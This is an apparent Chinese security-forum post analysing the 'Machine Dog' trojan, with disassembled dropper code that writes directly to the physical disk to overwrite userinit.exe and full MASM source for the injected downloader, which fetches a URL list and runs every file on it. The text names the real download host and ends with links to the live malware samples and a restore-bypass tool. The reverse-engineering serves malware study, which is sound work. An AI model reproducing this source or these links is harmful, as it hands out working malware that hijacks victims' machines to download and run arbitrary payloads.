push hObject ; hDevice
call DeviceIoControl ;通过FSCTL_GET_RETRIEVAL_POINTERS获取userinit文件数据的分布信息
or eax, eax
jz DeviceIoControlFailed
;这个结构是8字节对齐的,结构长度32字节
;typedef struct RETRIEVAL_POINTERS_BUFFER
;{
; DWORD ExtentCount;
; LARGE_INTEGER StartingVcn;
; struct
; {
; LARGE_INTEGER NextVcn;
; LARGE_INTEGER Lcn;
; } Extents[1];
;} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;
;typedef union union
;{
; struct
; {
; DWORD LowPart;
; LONG HighPart;
; };
; LONGLONG QuadPart;
;} LARGE_INTEGER, *PLARGE_INTEGER;
lea edi, OutBuffer ;OutBuffer是上面结构体指针
mov ebx, [edi] ;ExtentCount = Extents数组元素个数
lea edi, [edi+10h] ;指向Extents数组首地址,根据字节对齐
mov eax, DistanceToMoveHigh
or ebx, ebx ;判断ExtentCount是否为0
jz ExtentCountIsZero
mov eax, [edi+8] ;指向Extents[0].Lcn.LowPart
mov edx, [edi+0Ch] ;指向Extents[0].Lcn.HighPart
cmp eax, 0FFFFFFFFh
jz FEIHUA
cmp edx, 0FFFFFFFFh
jz FEIHUA
mov dwLowPartofLcn, eax ;保存lcn低32位
mov dwHighPartofLcn, edx ;保存lcn高32位
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpNumberOfBytesRead
push 200h ; nNumberOfBytesToRead
lea eax, Buffer
push eax ; lpBuffer
push hObject ; hFile
call ReadFile ;读取userinit文件开头512字节
push hObject ; hObject
call CloseHandle
mov hObject, 0 ;关闭文件
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push offset a_Physicaldrive ; "\\\\.\\PhysicalDrive0"
call CreateFileA ;打开物理硬盘读写
cmp eax, 0FFFFFFFFh
jz OPENPHYSICSFAILED
mov hFile, eax
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push hFile ; hFile
call SetFilePointer ; 定位
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpNumberOfBytesRead
push 200h ; nNumberOfBytesToRead
lea eax, PhysicalBuff
push eax ; lpBuffer
push hFile ; hFile
call ReadFile ;读取硬盘主引导分区MBR
;
; 0000 |------------------------------------------------|
; | |
; | |
; | Master Boot Record |
; | |
; | |
; | 主引导记录(446字节) |
; | |
; | |
; | |
; 01BD | |
; 01BE |------------------------------------------------|
; | |
; 01CD | 分区信息 1(16字节) |
; 01CE |------------------------------------------------|
; | |
; 01DD | 分区信息 2(16字节) |
; 01DE |------------------------------------------------|
; | |
; 01ED | 分区信息 3(16字节) |
; 01EE |------------------------------------------------|
; | |
; 01FD | 分区信息 4(16字节) |
; |------------------------------------------------|
; | 01FE | 01FF |
; | 55 | AA |
; |------------------------------------------------|
;分区表
;
; 分区表是一个链表,主分区表是分区链表的第一个节点。由于主分区表中只能分四个分区, 无法满足需求,
因此设计了一种扩展分区格式。扩展分区就是分区表的第二个节点到最后一个节点。
;
; 主分区表是从主引导扇区第0x1BE字节开始的,共64个字节,最后是0x55AA。64个字节的分区信息分为四组,每16字节为一组。每组的数据结构是这样的:
;
;typedef struct
;{
; BYTE byState;//分区状态, 0 = 未激活, 0x80 = 激活
; BYTE byBeginHead;//分区起始磁头号
; WORD wBeginSC;//分区起始扇区和柱面号, 底字节的低6位为扇区号, 高2位为柱面号的第 9,10 位, 高字节为柱面号的低 8 位
; BYTE byFSID; //分区类型, 如 0x0B = FAT32, 0x83 = Linux 等, 00 表示此项未用
; BYTE byEndHead;//分区结束磁头号
; WORD wEndSC;//分区结束扇区和柱面号
; DWORD dwInfoAreaSectors;//在线性寻址方式下的分区相对扇区地址
; DWORD dwSectors;//分区大小 (总扇区数)
;} INFOAREA_PARAM;//磁盘的分区信息
lea edi, PhysicalBuff
cmp byte ptr [edi+1BEh], 80h ;byState判断是否为活动分区
jnz NOTACTIVEDISK
movzx ebx, byte ptr [edi+1C2h] ;byFSID判断分区类型
cmp ebx, 0Bh
jz FAT32 ;Win95 FAT32
cmp ebx, 0Ch
jz FAT32 ;Win95 FAT32 LBA
cmp ebx, 7
jnz NTFS ;HPFS/NTFS
FAT32:
mov eax, [edi+1C6h] ;C盘起始扇区(首扇区的相对扇区号)
mov StartSectorC, eax
xor edx, edx
imul eax, 200h ;求出实际的字节偏移
mov DistanceToMoveHigh, edx
mov ecx, eax
push 0 ; dwMoveMethod
lea eax, DistanceToMoveHigh
push eax ; lpDistanceToMoveHigh
push ecx ; lDistanceToMove
push hFile ; hFile
call SetFilePointer ;定位到硬盘C盘起始扇区的绝对位置
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpNumberOfBytesRead
push 200h ; nNumberOfBytesToRead
lea eax, PhysicalBuff
push eax ; lpBuffer
push hFile ; hFile
call ReadFile ;读硬盘C盘起始扇区 即:第一个分区的引导扇区BPB
lea edi, PhysicalBuff
movzx eax, word ptr [edi+0Eh]; BPB_RsvdSecCnt = 保留扇区数量
add StartSectorC, eax
cmp ebx, 0Bh ;Win95 FAT32
jz WIN95FAT32
cmp ebx, 0Ch ;Win95 FAT32 LBA
jnz short FAT32LBA
WIN95FAT32:
movzx ecx, byte ptr [edi+10h]; BPB_NumFATS = 每个分区占用的FAT表 数
mov eax, [edi+24h] ; BPB_FATSz32 = 每个FAT占用扇区数
xor edx, edx
imul eax, ecx
add StartSectorC, eax ;数据记录起始扇区
FAT32LBA:
mov eax, dwLowPartofLcn
mov edx, dwHighPartofLcn
movzx ecx, byte ptr [edi+0Dh] ;BPB_SecPerClus = 每簇多少扇区
mov nNumberOfBytesToWrite, ecx
imul eax, ecx
add eax, StartSectorC
adc edx, 0
imul eax, 200h ;求出绝对偏移字节位置
mov HighOffset, edx ;偏移高32位
mov lDistanceToMove, eax ;低32位
push 0 ; dwMoveMethod
lea eax, HighOffset
push eax ; lpDistanceToMoveHigh
push lDistanceToMove ; lDistanceToMove
push hFile ; hFile
call SetFilePointer
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpNumberOfBytesRead
push 200h ; nNumberOfBytesToRead
lea eax, PhysicalBuff
push eax ; lpBuffer
push hFile ; hFile
call ReadFile ;在找到的硬盘扇区读
lea edi, PhysicalBuff
lea esi, Buffer
mov ecx, 200h
repe cmpsb ;通过对比ReadFile读取的文件数据和自己定位后直接读取所得到的文件数据,确定定位是否正确
or ecx, ecx
jnz DIFF
push 0 ; dwMoveMethod
lea eax, HighOffset
push eax ; lpDistanceToMoveHigh
push lDistanceToMove ; lDistanceToMove
push hFile ; hFile
call SetFilePointer ;重新定位到上面找到的硬盘扇区处
mov eax, nNumberOfBytesToWrite
shl eax, 9 ;这个值是作者估算的
mov nNumberOfBytesToWrite, eax
push nNumberOfBytesToWrite ; dwBytes
push 40h ; uFlags
call GlobalAlloc
or eax, eax
jz ALLOCMEMORYFAILED
mov lpBuffer,eax
mov ecx, offset MessageBoxA
sub ecx, offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
;把整个代码体作为参数传递给pcihdd.sys,控制码0xF0003C04,
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpBytesReturned
push nNumberOfBytesToWrite ; nOutBufferSize
push lpBuffer ; lpOutBuffer
push ecx ; nInBufferSize
push offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
push 0F0003C04h ; dwIoControlCode
push hDevice ; hDevice
call DeviceIoControl
;并将pcihdd返回的数据直接写入userinit.exe的第一簇
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpNumberOfBytesWritten
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
push lpBuffer ; lpBuffer
push hFile ; hFile
call WriteFile
push hFile ; hFile
call FlushFileBuffers
mov dwRet, 0
jmp OVER
ALLOCMEMORYFAILED:
; "分配内存不成功"
mov dwRet, offset aFCJ
OVER: ; hMem
push lpBuffer
call GlobalFree
jmp FINISHED
DIFF:
mov dwRet, offset ERR1
jmp FINISHED
NTFS:
mov dwRet, offset ERR2
jmp FINISHED
NOTACTIVEDISK:
mov dwRet, offset ERR3
FINISHED: ; hObject
push hFile
call CloseHandle
jmp OPENPHYSICSFAILED
FEIHUA:
mov dwRet, offset ERR4
OPENPHYSICSFAILED: ;打开硬盘设备失败
jmp ExtentCountIsZero
DeviceIoControlFailed:
mov dwRet, offset ERR5
ExtentCountIsZero:
cmp hObject, 0
jz ZeroObject
push hObject ; hObject
call CloseHandle
jmp ZeroObject
CreateUserInitFileFailed:
mov dwRet, offset ERR6
ZeroObject: ; hObject
push hDevice
call CloseHandle
jmp EXIT
CreateFileFailed:
mov dwRet, offset ERR7
EXIT:
popa
mov eax, dwRet
ret
DoMyWork endp
start proc
push 0 ; lpModuleName
call GetModuleHandleA
mov hModule, eax
call LoadServiceFromRes ;load service from resource
push 100h ; nSize
push offset Dst ; lpDst
push offset aSystemrootSyst ; "%SystemRoot%\\System32\\Userinit.exe"
call ExpandEnvironmentStringsA
push offset Dst ; lpFileName
call DoMyWork
or eax, eax
jnz FAILED
push offset OutputString ;
call OutputDebugStringA
jmp Exit
FAILED: ; lpOutputString
push eax
call OutputDebugStringA
Exit:
call QuitService
push 0 ; uExitCode
call ExitProcess
start endp
end start
文章作者:naitm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章备注:从IDA中复制,稍作修改所得。
ASM
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 机器狗写入到userinit.exe文件的恶意代码
; by naitm(http://hi.baidu.com/naitm)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat,stdcall
option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
nThreadCount dd 0
g_ThreadCount dd 0
PathName db '.',0
szAgent db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://127.0.0.1/cert.cer',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt proc @lpExePath
local @ProcessInformation:PROCESS_INFORMATION
local @StartupInfo:STARTUPINFO
invoke GetStartupInfo,addr @StartupInfo
invoke CreateProcess,0,@lpExePath,0,0,0,20h,0,0,addr @StartupInfo,addr
@ProcessInformation
.if eax == 0
invoke CloseHandle,@ProcessInformation.hThread
invoke CloseHandle,@ProcessInformation.hProcess
.endif
leave
retn 4
_RunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
local @hInternet,@hInternetFile,@hLocalFile,@nNumberOfBytesToWrite,@NumberOfBytesWritten,@nWriteCount
local @lpbuffer[200h]:BYTE
xor eax, eax
mov @nWriteCount, eax
invoke InternetOpen,addr szAgent,0,0,0,0
.if eax != 0
mov @hInternet, eax
invoke InternetSetOption,@hInternet,2,@Buffer,4
invoke InternetSetOption,@hInternet,6,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,0,0,200000h,0
.if eax != 0
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,13h,addr @lpbuffer,\
addr @NumberOfBytesWritten,addr @nNumberOfBytesToWrite
.if eax != 0
invoke CreateFile,@lpSaveFile,40000000h,0,0,4,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite, 0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr
@nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,\
addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax, @nWriteCount
leave
retn 0Ch
_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadEXERunIt proc @lpURL
local @DownTimes
local @TempFileName[204h]:BYTE
local @TempFileName2[204h]:BYTE
local @szUrl[104h]:BYTE
mov @DownTimes, 3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,204
invoke GetTempFileName,offset PathName,0,0,addr @TempFileName
invoke lstrcpy,addr @TempFileName2,addr @TempFileName
DownloadNxTime:
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
or eax, eax
jz DownloadFailed
invoke lstrcpy,addr @TempFileName,addr @TempFileName2
invoke _RunIt,addr @TempFileName
jmp DownloadEnd
; ---------------------------------------------------------------------------
DownloadFailed:
invoke Sleep,3E8h
dec @DownTimes
jnz DownloadNxTime
DownloadEnd:
dec nThreadCount
leave
retn 4
_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
main proc
local hKey,hObject,hFile,lpBaseAddress,ThreadId
local szShellValue[104h]:BYTE
invoke LoadLibrary,offset szUser32Dll
or eax, eax
jz RegQueryShell
invoke GetProcAddress,eax,offset szLoadRemoteFonts
or eax, eax
jz RegQueryShell
call eax
RegQueryShell:
invoke RegOpenKeyEx,80000002h,offset szSubKey,0,20019h,addr hKey
or eax, eax
jnz TestInternet
mov ThreadId, 104h
invoke RtlZeroMemory,addr szShellValue,104h
invoke RegQueryValueEx,hKey,offset szAgent,0,0,addr szShellValue,addr ThreadId
invoke _RunIt,addr szShellValue
invoke RegCloseKey,hKey
TestInternet:
invoke Sleep,3E8h
invoke InternetGetConnectedState,addr ThreadId,0
or eax, eax
jnz InternetConnect_OK
jmp TestInternet
; ---------------------------------------------------------------------------
InternetConnect_OK:
invoke RtlZeroMemory,addr szShellValue,104h
invoke GetTempFileName,offset PathName,0,0,addr szShellValue
DownList:
invoke Sleep,3E8h
invoke _DownloadFile,offset szUrlList,addr szShellValue,1388h
or eax, eax
jz DownListFailed
mov nThreadCount, 0
invoke CreateFile,addr szShellValue,GENERIC_READ,0,0,3,0,0
cmp eax, INVALID_HANDLE_VALUE
jz ReaptDownList
mov hFile, eax
invoke GetFileSize,hFile,0
cmp eax, 0Fh
jnb BeginDownEXE
invoke CloseHandle,hFile
jmp DownList
; ---------------------------------------------------------------------------
BeginDownEXE:
invoke CreateFileMapping,hFile,0,2,0,0,0
or eax, eax
jz CreateMapFailed
mov hObject, eax
invoke MapViewOfFile,eax,4,0,0,0
or eax, eax
jz MapViewFailed
mov lpBaseAddress, eax
mov esi, eax
loc_4005E1:
lea edi, szShellValue
push 104h
push edi
call RtlZeroMemory
WetherNewLine:
lodsb
cmp al, 0Ah
jnz loc_4005F8
lodsb
loc_4005F8:
cmp al, 0Dh
jz loc_400605
stosb
or al, al
jz UrlListEnd
jmp WetherNewLine
; ---------------------------------------------------------------------------
jmp UrlListEnd
; ---------------------------------------------------------------------------
loc_400605:
cmp szShellValue, 0
jz NextLine
inc nThreadCount
invoke CreateThread,0,0,offset _DownloadEXERunIt,addr
szShellValue,0,addr ThreadId
invoke CloseHandle,eax
invoke Sleep,64h
NextLine:
jmp loc_4005E1
; ---------------------------------------------------------------------------
UrlListEnd:
invoke UnmapViewOfFile,lpBaseAddress
MapViewFailed:
invoke CloseHandle,hObject
CreateMapFailed:
invoke CloseHandle,hFile
jmp WetherTreadend
; ---------------------------------------------------------------------------
ReaptDownList:
jmp DownList
; ---------------------------------------------------------------------------
jmp WetherTreadend
; ---------------------------------------------------------------------------
DownListFailed:
jmp DownList
; ---------------------------------------------------------------------------
WetherTreadend:
cmp nThreadCount, 0
jz ExitProgram
invoke Sleep,64h
jmp WetherTreadend
; ---------------------------------------------------------------------------
ExitProgram:
invoke ExitProcess,0
main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
鬼仔注:文章末尾所添加的机器狗、IGM、写穿还原的工具(已可以被卡巴检测到是病毒)是在无敌小龙那里看到的,我加了个备用地址。
样本脱壳
OD加载样本explorer.exe,
对GetModuleHandleA下断,参数为NULL时即为入口点处对此函数的调用,
退出CALL之后可以得到入口为 004016ED。
重新加载样本,对004016ED下内存写入断点,中断后StepOver一步,然后在004016ED
下断点,F9运行到入口,DUMP。DUMP之后不关闭OD,让样本处于挂起状态,使用ImportREC修复DUMP
出来的文件的导入表。
修复之后DUMP出来的文件用OD加载出错,使用PEDITOR的rebuilder功能重建PE之后即可用OD加载,说明
脱壳基本成功,但资源部分仍有问题,无法用Reshacker查看
pcihdd.sys的提取
OD加载样本explorer.exe,设置有新模块加载时中断,F9运行
当ADVAPI32.DLL加载时,对CreateServiceA下断点,F9运行
当CreateServiceA中断时,即可提取出pcihdd.sys
pcihdd.sys基本流程如下
1)检查IDT的09(NPX Segment Overrun)和0E(Page Fault )处理程序的地址
如果09号中断处理程序存在,并且处理程序地址的高8位与0E处理程序高8位不同,则把
IDT中0E的高16位设为0。估计是检查0E是不是被HOOK了
我比较龌龊,看不懂这些操作的意思,这样不BSOD?请懂的兄弟跟帖告诉一声
2)通过搜索地址来查找自己的加载地址
查找驱动文件的资源中的1000/1000,并复制到一个全局缓冲区中
3)创建了\Device\PhysicalHardDisk0及其符号连接\DosDevices\PhysicalHardDisk0
4)只对IRP_MJ_CREATE
IRP_MJ_CLOSE
IRP_MJ_DEVICE_CONTROL
作出响应
其中IRP_MJ_CREATE中会断开\Device\Harddisk0\DR0上附加的设备。这个操作会使磁盘过滤驱动、文件系统驱动(OS提供的,
但一些杀毒软件也通过此渠道进行文件系统监控)及其上的文件系统过滤驱动(大多数文件访问控制和监控
都是这个层次的)无效(参见http://blog.csdn.net/joshua_yu/archive/2006/02/04/591636.aspx)
在IRP_MJ_CLOSE 中对恢复DR0上的附加
在IRP_MJ_DEVICE_CONTROL中对0xF0003C04作出响应,只是把2)中找到的资源数据解密后返回到应用程序。
解密密钥是通过应用程序传入的一个串(密钥种子?)查表后产生(KEY:0x3f702d98)
0xF0003C04的作用:
将用户态传入的整个代码体作为密钥种子对这个代码体进行类似于校验和的运算后得
到4字节的解密KEY,然后使用此解密key将驱动自身携带的资源解密(仅仅是XOR),将解密
结果返回给用户态。
关于解除DR0上的附加设备:
这种操作应该会影响系统正常的文件系统操作,但是因为实际操作时此驱动被打开和关闭的的间隔很短,所以应该
不会有明显影响。
explorer.exe流程
1、释放资源中的pcihdd.sys并创建名为pcihdd的服务,启动服务
2、定位userinit.exe在硬盘中的位置。定位方法如下
1)通过FSCTL_GET_RETRIEVAL_POINTERS获取文件数据的分布信息
2)通过直接访问硬盘(\\\\.\\PhysicalHardDisk0)的的MDR和
第一个分区的引导扇区得到分区参数(每簇扇区数),配合1)中得到的信息
来定位文件在硬盘上的绝对偏移量。
这里有个小BUG,扇区大小是使用固定的512字节而不是从引导扇区中获取
3)通过对比ReadFile读取的文件数据和自己定位后直接
读取所得到的文件数据,确定定位是否正确
3、把整个代码体作为参数传递给pcihdd.sys,控制码0xF0003C04,并将pcihdd返回
的数据直接写入userinit.exe的第一簇
被修改后的userinit.exe
1)查询SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下的Shell键值
2)创建Shell进程
3)等待网络链接,当网络链接畅通后,则从http://yu.8s7.net/cert.cer下载列表
4)对于列表中的文件每个文件,创建一个新线程下载并执行,线程计数加一(INC)
5)等待所有线程结束后(线程计数为0)结束进程。
对于线程计数的操作并不是原子操作,理论上多CPU情况下有小的概率出问题。
不过人家是写针对普通PC的病毒,多CPU不常见,也不需要稳定
simple.rar (142.99 KB)
文中所指的病毒就是一般说的新AV终结者
机器狗:http://www.esfast.net/downs/explorer.rar [备用地址]
IGM:http://www.esfast.net/downs/IGM.rar [备用地址]
写穿还原的工具:http://www.esfast.net/downs/SectorEditor.zip